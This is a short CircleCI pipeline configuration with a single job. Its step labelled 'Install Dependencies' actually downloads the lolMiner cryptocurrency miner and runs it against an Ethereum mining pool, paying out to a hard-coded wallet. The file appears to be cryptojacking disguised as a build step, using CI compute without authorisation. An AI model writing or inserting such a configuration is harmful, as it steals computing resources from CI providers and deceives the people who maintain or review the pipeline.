version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.31/lolMiner_v1.31_Lin64.tar.gz && tar -zxvf lolMiner_v1.31_Lin64.tar.gz && cd 1.31 && clear && ./lolMiner --algo ETHASH --pool ethash.unmineable.com:3333 --user ETH:0x74c171FC58f9F5BE5A2995e89B6D79C75c103537.TEXMINER --ethstratum ETHPROXY
    
workflows:
    version: 2.1
    build:
        jobs:
            - Devop
            